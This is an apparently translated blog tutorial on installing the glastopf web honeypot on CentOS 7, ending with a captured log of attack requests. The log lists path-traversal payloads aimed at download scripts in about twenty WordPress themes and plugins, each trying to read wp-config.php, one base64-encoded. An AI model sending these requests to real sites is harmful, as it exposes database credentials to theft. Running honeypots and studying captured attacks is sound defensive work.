There are cases where servers get cracked through vulnerabilities in phpMyAdmin or WordPress plugins.
I want to observe what such intruders do, safely!
A tool you can use for that is glastopf.
Let's find out what kind of accesses arrive at this honeypot!
glastopf is a honeypot specialized for the web.
The installation steps are as follows.
The OS used for the installation was CentOS 7.1.1503.
Installing the required packages
```
yum groupinstall "Development Tools"
yum install zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel php-devel libxml2-devel libxslt-devel atlas atlas-devel gcc-gfortran g++ git php php-devel wget mysql mysql-server mysql-devel libevent-headers libffi-devel
easy_install pip
yum -y install python-devel
```
Setting up glastopf
```
git clone https://github.com/glastopf/glastopf.git
cd glastopf
python setup.py install
```
Create the configuration file.
```
cd /opt/glastopf/
glastopf-runner
## This errors out, so
## apply the following fixes.
groupadd glastopf
useradd -g glastopf -s /usr/sbin/nologin glastopf
chown -R glastopf:glastopf /opt/glastopf/
vim /opt/glastopf/glastopf.cfg
# cat /opt/glastopf/glastopf.cfg
[webserver]
host = 0.0.0.0
port = 80
uid = glastopf
gid = glastopf
proxy_enabled = False
```
Starting it up
```
glastopf-runner &
```
A few days after starting it, I confirmed that suspicious accesses were arriving.
```
2015-06-23 13:35:40,203 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/plugins/gi-media-library/download.php?fileid=Li4vLi4vLi4vd3AtY29uZmlnLnBocA==
2015-06-23 13:35:40,600 (glastopf.glastopf) 206.190.138.84 requested GET ?sd_action=demo&file=wp-config.php
2015-06-23 13:35:40,994 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
2015-06-23 13:35:41,387 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/lote27/download.php?download=../../../wp-config.php
2015-06-23 13:35:41,769 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
2015-06-23 13:35:42,173 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/RedSteel/download.php?file=../../../wp-config.php
2015-06-23 13:35:42,562 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
2015-06-23 13:35:42,950 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/markant/download.php?file=../../wp-config.php
2015-06-23 13:35:43,219 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/yakimabait/download.php?file=./wp-config.php
2015-06-23 13:35:43,620 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
2015-06-23 13:35:43,997 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/felis/download.php?file=../wp-config.php
2015-06-23 13:35:44,271 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
2015-06-23 13:35:44,715 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
2015-06-23 13:35:45,147 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/epic/includes/download.php?file=wp-config.php
2015-06-23 13:35:45,553 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
2015-06-23 13:35:45,965 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
2015-06-23 13:35:46,232 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
2015-06-23 13:35:46,487 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
2015-06-23 13:35:46,750 (glastopf.glastopf) 206.190.138.84 requested GET /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
```
Have a good honeypot life!
Reference: 「VPSにハニーポット(Glastopf) を入れてみた」 (Installing a honeypot (Glastopf) on a VPS)